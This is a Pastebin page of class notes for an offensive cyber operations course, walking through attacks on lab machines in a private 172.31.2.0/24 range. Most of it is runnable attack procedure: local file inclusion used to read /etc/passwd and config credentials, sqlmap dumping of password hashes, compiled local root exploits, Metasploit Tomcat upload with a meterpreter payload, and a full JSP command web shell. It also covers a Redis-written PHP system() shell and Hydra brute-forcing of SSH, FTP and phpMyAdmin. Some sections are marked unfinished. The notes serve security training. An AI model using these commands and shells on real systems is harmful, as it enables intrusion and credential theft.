joemccray

CyberWar AOCO Version 3

Nov 21st, 2017
3,034
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ########################################################
  2. # CyberWar: Advanced Offensive Cyber Operations #
  3. # By Joe McCray of Strategic Security #
  4. ########################################################
  5.  
  6.  
  7.  
  8. #########################
  9. # Class Virtual Machine #
  10. #########################
  11.  
  12.  
  13. Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:
  14.  
  15. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
  16. user: infosecaddicts
  17. pass: infosecaddicts
  18.  
  19.  
  20. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
  21.  
  22.  
  23. To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
  24. https://54.245.178.32/?src=connect
  25.  
  26.  
  27. Accept the security exception and enter one of the following user names:
  28.  
  29. username: labuser001
  30. username: labuser002
  31. username: labuser003
  32. username: labuser004
  33. username: labuser005
  34. username: labuser006
  35. username: labuser007
  36. username: labuser008
  37. username: labuser009
  38. username: labuser010
  39. username: labuser011
  40. username: labuser012
  41. username: labuser013
  42. username: labuser014
  43. username: labuser015
  44. username: labuser016
  45. username: labuser017
  46. username: labuser018
  47. username: labuser019
  48. username: labuser020
  49.  
  50. ----------------------------------------------------------------------------------------------------------------------------------------
  51.  
  52. Mr. McCray will provide you with the password for the usernames above once the training session starts.
  53.  
  54.  
  55.  
  56.  
  57. The target network range is:
  58. 172.31.2.0/24
  59.  
  60.  
  61. You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72. ----------------------------------------------------------------------------------------------------------------------------------------
  73. Some tools to install:
  74. ---------------------------Type This-----------------------------------
  75. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  76. gcc propecia.c -o propecia
  77. sudo cp propecia /bin
  78. -----------------------------------------------------------------------
  79.  
  80.  
  81.  
  82.  
  83.  
  84. Step 1: Portscan the server
  85. ---------------------------Type This-----------------------------------
  86. sudo nmap -sS 172.31.2.139
  87. -----------------------------------------------------------------------
  88.  
  89. Step 2: Version scan the server
  90. ---------------------------Type This-----------------------------------
  91. sudo nmap -sV -p22,80 172.31.2.139
  92. -----------------------------------------------------------------------
  93.  
  94.  
  95.  
  96. Step 3: Vulnerability scan the webserver
  97. ---------------------------Type This-----------------------------------
  98. cd ~/toolz/
  99.  
  100. rm -rf nikto*
  101.  
  102. git clone https://github.com/sullo/nikto.git Nikto2
  103.  
  104. cd Nikto2/program
  105.  
  106. perl nikto.pl -h 172.31.2.139
  107. -----------------------------------------------------------------------
  108.  
  109.  
  110.  
  111.  
  112. Step 4: Directory brute-force the webserver
  113. ---------------------------Type This-----------------------------------
  114. cd ~/toolz
  115.  
  116. git clone https://github.com/v0re/dirb.git
  117.  
  118. cd dirb/
  119.  
  120. ./configure
  121.  
  122. make
  123.  
  124. dirb
  125.  
  126. ./dirb http://172.31.2.139 wordlists/big.txt
  127. -----------------------------------------------------------------------
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141. ----------------------------------------------------------------------------------------------------------------------------------------------
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148. Attack steps:
  149. -------------
  150.  
  151.  
  152. Step 1: Ping sweep the target network
  153. -------------------------------------
  154.  
  155.  
  156. ---------------------------Type This-----------------------------------
  157. nmap -sP 172.31.2.0/24
  158. -----------------------------------------------------------------------
  159.  
  160. Found 4 hosts:
  161. 172.31.2.47
  162. 172.31.2.47
  163. 172.31.2.157
  164. 172.31.2.217
  165.  
  166.  
  167. Step 2: Port scan target system
  168. -------------------------------
  169.  
  170.  
  171. ---------------------------Type This-----------------------------------
  172. sudo nmap -sV 172.31.2.47
  173. -----------------------------------------------------------------------
  174.  
  175.  
  176.  
  177. PORT STATE SERVICE VERSION
  178. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
  179. 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
  180. 514/tcp filtered shell
  181. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  182.  
  183.  
  184.  
  185. Step 3: Vulnerability Scan the webserver
  186. ----------------------------------------
  187.  
  188.  
  189. ---------------------------Type This-----------------------------------
  190. cd ~/toolz/
  191.  
  192. rm -rf nikto*
  193.  
  194. git clone https://github.com/sullo/nikto.git Nikto2
  195.  
  196. cd Nikto2/program
  197.  
  198. perl nikto.pl -h 172.31.2.47
  199. -----------------------------------------------------------------------
  200.  
  201.  
  202. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  203. -----------------------------------------------------------------------------
  204.  
  205.  
  206. ---------------------------Type This-----------------------------------
  207. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  208.  
  209. perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"
  210. -----------------------------------------------------------------------
  211.  
  212.  
  213.  
  214. Step 5: Browse the web site to look for clues
  215. ---------------------------------------------
  216. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  217.  
  218.  
  219. http://172.31.2.47/test
  220. http://172.31.2.47/test.php (got the following error message)
  221. 'file' parameter is empty. Please provide file path in 'file' parameter
  222.  
  223. Figured this was a Local File Include (LFI) so I tried:
  224. http://172.31.2.47/test.php?file=/etc/passwd
  225. http://172.31.2.47/test.php?file=/etc/passwd%00
  226.  
  227. None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
  228. ---------------------------Type This-----------------------------------
  229. curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
  230. -----------------------------------------------------------------------
  231.  
  232.  
  233.  
  234. http://172.31.2.47/a
  235. http://172.31.2.47/b
  236. http://172.31.2.47/c (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"
  237.  
  238. So let's try that POST request with curl to pull down the c.php config file.
  239.  
  240. ---------------------------Type This-----------------------------------
  241. curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
  242. curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php
  243. curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
  244. -----------------------------------------------------------------------
  245.  
  246. <?php
  247. #header( 'Z-Powered-By:its chutiyapa xD' );
  248. header('X-Frame-Options: SAMEORIGIN');
  249. header( 'Server:testing only' );
  250. header( 'X-Powered-By:testing only' );
  251.  
  252. ini_set( 'session.cookie_httponly', 1 );
  253.  
  254. $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
  255.  
  256. // Check connection
  257. if (mysqli_connect_errno())
  258. {
  259. echo "connection failed -> " . mysqli_connect_error();
  260. }
  261.  
  262. ?>
  263.  
  264.  
  265.  
  266. ---------------------------Type This-----------------------------------
  267. ssh -l billu 172.31.2.47
  268. b0x_billu
  269. -----------------------------------------------------------------------
  270.  
  271.  
  272.  
  273. http://172.31.2.47/phpmyadmin
  274. http://172.31.2.47/phpMyAdmin
  275. http://172.31.2.47/pma
  276. http://172.31.2.47/phpmy
  277.  
  278.  
  279. Then I Googled config file name for phpmyadmin (config.inc.php)
  280.  
  281. ---------------------------Type This-----------------------------------
  282. curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
  283. -----------------------------------------------------------------------
  284. <?php
  285.  
  286. /* Servers configuration */
  287. $i = 0;
  288.  
  289. /* Server: localhost [1] */
  290. $i++;
  291. $cfg['Servers'][$i]['verbose'] = 'localhost';
  292. $cfg['Servers'][$i]['host'] = 'localhost';
  293. $cfg['Servers'][$i]['port'] = '';
  294. $cfg['Servers'][$i]['socket'] = '';
  295. $cfg['Servers'][$i]['connect_type'] = 'tcp';
  296. $cfg['Servers'][$i]['extension'] = 'mysqli';
  297. $cfg['Servers'][$i]['auth_type'] = 'cookie';
  298. $cfg['Servers'][$i]['user'] = 'root';
  299. $cfg['Servers'][$i]['password'] = 'roottoor';
  300. $cfg['Servers'][$i]['AllowNoPassword'] = true;
  301.  
  302.  
  303. ---------------------------Type This-----------------------------------
  304. ssh -l root 172.31.2.47
  305. roottoor
  306. -----------------------------------------------------------------------
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  314.  
  315. Attack steps:
  316. -------------
  317.  
  318.  
  319.  
  320. Step 1: Ping sweep the target network
  321. -------------------------------------
  322.  
  323.  
  324. ---------------------------Type This-----------------------------------
  325. nmap -sP 172.31.2.0/24
  326. -----------------------------------------------------------------------
  327.  
  328.  
  329.  
  330. - Found 3 hosts
  331. 172.31.2.64
  332. 172.31.2.217
  333. 172.31.2.238
  334.  
  335.  
  336.  
  337. Step 2: Port scan target system
  338. -------------------------------
  339.  
  340.  
  341. ---------------------------Type This-----------------------------------
  342. nmap -sV 172.31.2.64
  343. -----------------------------------------------------------------------
  344.  
  345.  
  346.  
  347. -------------Scan Results--------------------------------------------
  348. PORT STATE SERVICE VERSION
  349. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  350. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  351. 514/tcp filtered shell
  352. 1037/tcp filtered ams
  353. 6667/tcp open irc ngircd
  354. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  355. --------------------------------------------------------------------
  356.  
  357.  
  358. Step 3: Vulnerability Scan the webserver
  359. ----------------------------------------
  360.  
  361.  
  362. ---------------------------Type This-----------------------------------
  363. cd ~/toolz/
  364.  
  365. rm -rf nikto*
  366.  
  367. git clone https://github.com/sullo/nikto.git Nikto2
  368.  
  369. cd Nikto2/program
  370.  
  371. perl nikto.pl -h 172.31.2.64
  372. -----------------------------------------------------------------------
  373.  
  374.  
  375. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  376. -----------------------------------------------------------------------------
  377.  
  378.  
  379. ---------------------------Type This-----------------------------------
  380. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  381.  
  382. perl Webr00t.pl -h 172.31.2.64 -v
  383. -----------------------------------------------------------------------
  384.  
  385.  
  386.  
  387. Step 5: Browse the web site to look for clues
  388. ---------------------------------------------
  389. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  390.  
  391.  
  392. ..... really didn't get much from here so we just opened the web page in a browser
  393. http://172.31.2.64/
  394.  
  395. .....browsed to the webpage and saw that it pointed to:
  396. http://172.31.2.64/jabc
  397.  
  398. ....clicked on documentation link and found hidden text that pointed to here:
  399. http://172.31.2.64/jabcd0cs/
  400.  
  401. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  402. https://www.exploit-db.com/exploits/32075/
  403.  
  404. Tried the sql injection described in exploit-db:
  405. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  406.  
  407. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  408.  
  409.  
  410.  
  411. Tried to run sqlmap against the target
  412.  
  413.  
  414. ---------------------------Type This-----------------------------------
  415. cd sqlmap-dev/
  416. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  417.  
  418. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  419.  
  420. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  421.  
  422. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  423.  
  424. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  425. -----------------------------------------------------------------------
  426.  
  427.  
  428.  
  429. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  430. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  431.  
  432.  
  433.  
  434. ---------------------------Type This-----------------------------------
  435. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  436.  
  437. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  438. -----------------------------------------------------------------------
  439.  
  440. username: webmin
  441. hash: b78aae356709f8c31118ea613980954b
  442.  
  443. https://hashkiller.co.uk/md5-decrypter.aspx
  444.  
  445. hash: b78aae356709f8c31118ea613980954b
  446. pass: webmin1980
  447.  
  448.  
  449. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  450.  
  451.  
  452.  
  453. ---------------------------Type This-----------------------------------
  454. ssh -l webmin 172.31.2.64
  455. webmin1980
  456.  
  457. id
  458.  
  459. cat /etc/*release
  460. -----------------------------------------------------------------------
  461.  
  462.  
  463.  
  464. ....tired of not having a real command shell...
  465.  
  466.  
  467. ---------------------------Type This-----------------------------------
  468. python -c 'import pty;pty.spawn("/bin/bash")'
  469.  
  470.  
  471. cd /tmp
  472.  
  473. pwd
  474.  
  475.  
  476. cat >> exploit.c << out
  477.  
  478. **************paste in the content from here *****************
  479. https://www.exploit-db.com/raw/39166/
  480.  
  481.  
  482. ------ hit enter a few times ------
  483.  
  484. ------ then type 'out' ----- this closes the file handle...
  485.  
  486.  
  487.  
  488. ---------------------------Type This-----------------------------------
  489. gcc -o boom exploit.c
  490.  
  491. ./boom
  492. -----------------------------------------------------------------------
  493.  
  494.  
  495. ------------exploit failed, damn let's try another one ---------
  496.  
  497.  
  498.  
  499. ---------------------------Type This-----------------------------------
  500. cat >> exploit2.c << out
  501.  
  502. **************paste in the content from here *****************
  503. https://www.exploit-db.com/raw/37292/
  504.  
  505.  
  506. out
  507.  
  508.  
  509. gcc -o boom2 exploit2.c
  510.  
  511. ./boom2
  512.  
  513. id
  514.  
  515.  
  516. ......YEAH - do the happy dance!!!!
  517.  
  518.  
  519.  
  520.  
  521. ---- Previous class attack process -------
  522.  
  523.  
  524. #########################
  525. # Building a quick list #
  526. #########################
  527.  
  528. ---------------------------Type This-----------------------------------
  529.  
  530. cd ~
  531. echo bob >> list.txt
  532. echo jim >> list.txt
  533. echo joe >> list.txt
  534. echo tim >> list.txt
  535. echo admin >> list.txt
  536. echo hello >> list.txt
  537. echo rob >> list.txt
  538. echo test >> list.txt
  539. echo aaaaaa >> list.txt
  540. echo larry >> list.txt
  541. echo mario >> list.txt
  542. echo jason >> list.txt
  543. echo john >> list.txt
  544. -----------------------------------------------------------------------
  545.  
  546.  
  547. ###########################################################
  548. # Let's start with some basic scanning of the lab network #
  549. ###########################################################
  550.  
  551. ---------------------------Type This-----------------------------------
  552.  
  553. infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
  554. -----------------------------------------------------------------------
  555.  
  556. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
  557. Nmap scan report for 172.31.2.24
  558. Host is up (0.046s latency).
  559. Nmap scan report for 172.31.2.47
  560. Host is up (0.045s latency).
  561. Nmap scan report for 172.31.2.64
  562. Host is up (0.037s latency).
  563. Nmap scan report for 172.31.2.86
  564. Host is up (0.040s latency).
  565. Nmap scan report for 172.31.2.117
  566. Host is up (0.038s latency).
  567. Nmap scan report for 172.31.2.139
  568. Host is up (0.037s latency).
  569. Nmap scan report for 172.31.2.157
  570. Host is up (0.036s latency).
  571. Nmap scan report for 172.31.2.217
  572. Host is up (0.047s latency).
  573. Nmap scan report for 172.31.2.238
  574. Host is up (0.036s latency).
  575. Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds
  576.  
  577.  
  578.  
  579.  
  580.  
  581.  
  582. ---------------------------Type This-----------------------------------
  583.  
  584. infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
  585. -----------------------------------------------------------------------
  586.  
  587. [sudo] password for infosecaddicts:
  588.  
  589. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
  590. Nmap scan report for 172.31.2.24
  591. Host is up (1.8s latency).
  592. Not shown: 989 closed ports
  593. PORT STATE SERVICE
  594. 25/tcp open smtp
  595. 80/tcp open http
  596. 111/tcp open rpcbind
  597. 139/tcp open netbios-ssn
  598. 445/tcp open microsoft-ds
  599. 514/tcp filtered shell
  600. 1322/tcp open novation
  601. 2049/tcp open nfs
  602. 8080/tcp open http-proxy
  603. 8081/tcp open blackice-icecap
  604. 9000/tcp open cslistener
  605.  
  606. Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds
  607.  
  608.  
  609.  
  610.  
  611.  
  612.  
  613.  
  614. ---------------------------Type This-----------------------------------
  615.  
  616. infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
  617. -----------------------------------------------------------------------
  618.  
  619. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
  620. Nmap scan report for 172.31.2.24
  621. Host is up (0.031s latency).
  622. PORT STATE SERVICE VERSION
  623. 25/tcp open ftp vsftpd 3.0.2
  624. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  625. 111/tcp open rpcbind 2-4 (RPC #100000)
  626. 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
  627. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
  628. 1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  629. 2049/tcp open nfs_acl 2-3 (RPC #100227)
  630. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  631. 8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  632. 9000/tcp open http Jetty winstone-2.9
  633. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  634.  
  635. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  636. Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
  637.  
  638.  
  639.  
  640.  
  641.  
  642.  
  643.  
  644.  
  645. ###########################
  646. # Day 1: Attacking Kevgir #
  647. ###########################
  648.  
  649.  
  650. ******** Attacking Kevgir ********
  651. I figured I've give you something fun to play with.
  652.  
  653.  
  654.  
  655. ###############
  656. # Using Nikto #
  657. ###############
  658.  
  659. ---------------------------Type This-----------------------------------
  660.  
  661. cd ~/toolz/
  662.  
  663. rm -rf nikto*
  664.  
  665. git clone https://github.com/sullo/nikto.git Nikto2
  666.  
  667. cd Nikto2/program
  668.  
  669. perl nikto.pl -h 172.31.2.24
  670.  
  671. perl nikto.pl -h 172.31.2.24:8080
  672.  
  673. perl nikto.pl -h 172.31.2.24:8081
  674.  
  675. perl nikto.pl -h 172.31.2.24:9000
  676.  
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680.  
  681. ####################
  682. # Using Metasploit #
  683. ####################
  684.  
  685. ---------------------------Type This-----------------------------------
  686.  
  687. cd ~/toolz/metasploit
  688.  
  689. ./msfconsole
  690.  
  691. use auxiliary/scanner/http/http_version
  692.  
  693. set RHOSTS 172.31.2.24
  694.  
  695. set RPORT 8080
  696.  
  697. run
  698.  
  699.  
  700. -------------------------------
  701.  
  702. use auxiliary/scanner/http/tomcat_enum
  703.  
  704. set RHOSTS 172.31.2.24
  705.  
  706. set RPORT 8080
  707.  
  708. run
  709. -----------------------------------------------------------------------
  710.  
  711.  
  712.  
  713.  
  714.  
  715. ####################
  716. # Attacking Tomcat #
  717. ####################
  718.  
  719. ---------------------------Type This-----------------------------------
  720.  
  721. use auxiliary/scanner/http/http_version
  722.  
  723. set RHOSTS 172.31.2.24
  724.  
  725. set RPORT 8080
  726.  
  727. run
  728.  
  729.  
  730. -------------------------------
  731.  
  732.  
  733. use auxiliary/scanner/http/tomcat_mgr_login
  734.  
  735. set USERNAME tomcat
  736.  
  737. set USERPASS_FILE /home/infosecaddicts/list.txt
  738.  
  739. set STOP_ON_SUCCESS true
  740.  
  741. set RHOSTS 172.31.2.24
  742.  
  743. set RPORT 8080
  744.  
  745. run
  746.  
  747.  
  748. -------------------------------
  749.  
  750. use exploit/multi/http/tomcat_mgr_upload
  751.  
  752. set HttpUsername tomcat
  753.  
  754. set HttpPassword tomcat
  755.  
  756. set RHOST 172.31.2.24
  757.  
  758. set RPORT 8080
  759.  
  760. set PATH /manager/html
  761.  
  762. set PAYLOAD java/meterpreter/bind_tcp
  763.  
  764. exploit
  765.  
  766.  
  767. run post/linux/gather/checkvm
  768.  
  769. run post/linux/gather/enum_configs
  770.  
  771. run post/linux/gather/enum_protections
  772.  
  773. run post/linux/gather/enum_system
  774.  
  775. run post/linux/gather/enum_users_history
  776.  
  777. run post/linux/gather/hashdump
  778.  
  779. shell
  780.  
  781. /bin/bash
  782.  
  783. id
  784.  
  785. uname -a
  786.  
  787. dpkg -l
  788.  
  789. cd /tmp
  790.  
  791. pwd
  792.  
  793.  
  794. cat >> exploit.c << out
  795.  
  796. **************paste in the content from here *****************
  797. https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
  798.  
  799.  
  800. ------ hit enter a few times ------
  801.  
  802. ------ then type 'out' ----- this closes the file handle...
  803.  
  804.  
  805. gcc -o boom exploit.c
  806.  
  807. ./boom
  808.  
  809. id
  810.  
  811.  
  812. -----------------------------------------------------------------------
  813.  
  814. ---------------------------Type This-----------------------------------
  815.  
  816. hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
  817. -----------------------------------------------------------------------
  818.  
  819.  
  820.  
  821.  
  822.  
  823. -------------------------------------------index.jsp-------------------------------------------
  824. <FORM METHOD=GET ACTION='index.jsp'>
  825. <INPUT name='cmd' type=text>
  826. <INPUT type=submit value='Run'>
  827. </FORM>
  828. <%@ page import="java.io.*" %>
  829. <%
  830. String cmd = request.getParameter("cmd");
  831. String output = "";
  832. if(cmd != null) {
  833. String s = null;
  834. try {
  835. Process p = Runtime.getRuntime().exec(cmd,null,null);
  836. BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
  837. while((s = sI.readLine()) != null) { output += s+"</br>"; }
  838. } catch(IOException e) { e.printStackTrace(); }
  839. }
  840. %>
  841. <pre><%=output %></pre>
  842. -------------------------------------------index.jsp-------------------------------------------
  843.  
  844. ***** now pack the webshell *****
  845.  
  846.  
  847. ---------------------------Type This-----------------------------------
  848.  
  849. mkdir webshell
  850. cp index.jsp webshell
  851.  
  852. cd webshell
  853. jar -cvf ../webshell.war *
  854. -----------------------------------------------------------------------
  855.  
  856.  
  857. Deploy the WAR file using the built-in deploy option on the manager web-page.
  858. Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
  859. now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/
  860.  
  861.  
  862.  
  863. ****** This section isn't finished ******
  864.  
  865. ---------------------------Type This-----------------------------------
  866.  
  867. cd ~/toolz/metasploit
  868.  
  869. ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
  870.  
  871. jar tf ~/bind7777.war
  872. -----------------------------------------------------------------------
  873.  
  874. ****** This section isn't finished ******
  875.  
  876. Google is your friend hahahahahahahah........
  877.  
  878.  
  879. #################
  880. # Attacking FTP #
  881. #################
  882.  
  883. ---------------------------Type This-----------------------------------
  884.  
  885. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
  886.  
  887. cd ~/toolz/hydra
  888.  
  889. hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp
  890.  
  891. ftp
  892. open 172.31.2.24
  893. admin
  894. admin
  895. pwd
  896. ls -lah
  897.  
  898. ls ../../
  899. -----------------------------------------------------------------------
  900.  
  901.  
  902. #################
  903. # Attacking SSH #
  904. #################
  905.  
  906. ---------------------------Type This-----------------------------------
  907.  
  908. sudo apt-get install -y libssh-dev
  909. infosecaddicts
  910. cd ~/toolz/hydra
  911. make clean
  912. ./configure
  913. make
  914. sudo make install
  915.  
  916.  
  917. hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh
  918.  
  919. ssh -p 1322 admin@172.31.2.24
  920.  
  921.  
  922. -------------------------------
  923.  
  924. cd ~/toolz/metasploit
  925.  
  926. ./msfconsole
  927.  
  928. use auxiliary/scanner/ssh/ssh_enumusers
  929.  
  930. set USER_FILE /home/infosecaddicts/list.txt
  931.  
  932. set STOP_ON_SUCCESS true
  933.  
  934. set RHOSTS 172.31.2.24
  935.  
  936. set RPORT 1322
  937.  
  938. run
  939.  
  940.  
  941.  
  942.  
  943.  
  944. use auxiliary/scanner/ssh/ssh_login
  945.  
  946. set USER_FILE /home/infosecaddicts/list.txt
  947.  
  948. set PASS_FILE /home/infosecaddicts/list.txt
  949.  
  950. set STOP_ON_SUCCESS true
  951.  
  952. set RHOSTS 172.31.2.24
  953.  
  954. set RPORT 1322
  955.  
  956. run
  957.  
  958.  
  959. sessions -l
  960.  
  961. sessions -u 1
  962.  
  963. sessions -i 1
  964.  
  965. id
  966.  
  967. -----------------------------------------------------------------------
  968.  
  969.  
  970. ########################
  971. # Attacking phpMyAdmin #
  972. ########################
  973. ****** This section isn't finished ******
  974.  
  975. ---------------------------Type This-----------------------------------
  976.  
  977. hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
  978. -----------------------------------------------------------------------
  979.  
  980. ****** This section isn't finished ******
  981.  
  982. Google is your friend hahahahahahahah........
  983.  
  984.  
  985.  
  986. ---------------------------Type This-----------------------------------
  987.  
  988. wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
  989.  
  990. python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
  991. -----------------------------------------------------------------------
  992.  
  993.  
  994.  
  995.  
  996.  
  997.  
  998. ####################
  999. # Attacking Joomla #
  1000. ####################
  1001.  
  1002. ---------------------------Type This-----------------------------------
  1003.  
  1004. cd ~/toolz/metasploit
  1005.  
  1006. ./msfconsole
  1007.  
  1008. use use auxiliary/scanner/http/joomla_plugins
  1009.  
  1010. set RHOSTS 172.31.2.24
  1011.  
  1012. set RPORT 8080
  1013.  
  1014. run
  1015. -----------------------------------------------------------------------
  1016.  
  1017.  
  1018. ****** This section isn't finished ******
  1019. Google is your friend hahahahahahahah........
  1020.  
  1021. #####################
  1022. # Attacking Jenkins #
  1023. #####################
  1024.  
  1025.  
  1026. ****** This section isn't finished ******
  1027. Google is your friend hahahahahahahah........
  1028.  
  1029. #################
  1030. # Attacking NFS #
  1031. #################
  1032.  
  1033. ---------------------------Type This-----------------------------------
  1034.  
  1035. sudo apt install -y rpcbind nfs-common
  1036.  
  1037. rpcinfo -s 172.31.2.24
  1038.  
  1039. showmount -e 172.31.2.24
  1040.  
  1041. sudo /bin/bash
  1042.  
  1043. mkdir /tmp/nfs
  1044.  
  1045. mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock
  1046.  
  1047. ls /tmp/nfs
  1048.  
  1049. cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
  1050.  
  1051. umount -l /tmp/nfs
  1052.  
  1053. exit
  1054.  
  1055. sudo apt-cache search fcrackzip
  1056.  
  1057. sudo apt-get install -y fcrackzip
  1058.  
  1059. fcrackzip -u backup.tar.bz2.zip
  1060.  
  1061. unzip -P aaaaaa backup.tar.bz2.zip
  1062.  
  1063. tar jxf backup.tar.bz2
  1064. -----------------------------------------------------------------------
  1065.  
  1066.  
  1067. ###################
  1068. # Attacking Redis #
  1069. ###################
  1070.  
  1071. ---------------------------Type This-----------------------------------
  1072.  
  1073. sudo nmap -p 6379 --script=redis-info 172.31.2.24
  1074. infosecaddicts
  1075.  
  1076. sudo apt-get install -y redis-tools
  1077. infosecaddicts
  1078.  
  1079. redis-cli -h 172.31.2.24
  1080.  
  1081. CONFIG SET dir /var/www/html/main
  1082.  
  1083. CONFIG GET dir
  1084.  
  1085. config set dbfilename boom.php
  1086.  
  1087. CONFIG GET dbfilename
  1088.  
  1089. SET cmd "<?php system($_GET['joe']); ?>"
  1090.  
  1091. BGSAVE
  1092.  
  1093. http://172.31.2.24/boom.php
  1094.  
  1095. http://172.31.2.24/boom.php?joe=id
  1096.  
  1097.  
  1098. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
  1099.  
  1100.  
  1101.  
  1102. ****** This section isn't finished ******
  1103. Google is your friend hahahahahahahah........
  1104.  
  1105. cd ~/toolz/metasploit
  1106.  
  1107. ./msfconsole
  1108.  
  1109. use auxiliary/scanner/redis/file_upload
  1110.  
  1111. set RHOSTS 172.31.2.24
  1112.  
  1113. set LocalFile
  1114.  
  1115. ****** This section isn't finished ******
  1116. Google is your friend hahahahahahahah........
  1117.  
  1118.  
  1119.  
  1120.  
  1121.  
  1122. sudo nmap -sV -p 3260 172.31.2.217
  1123.  
  1124.  
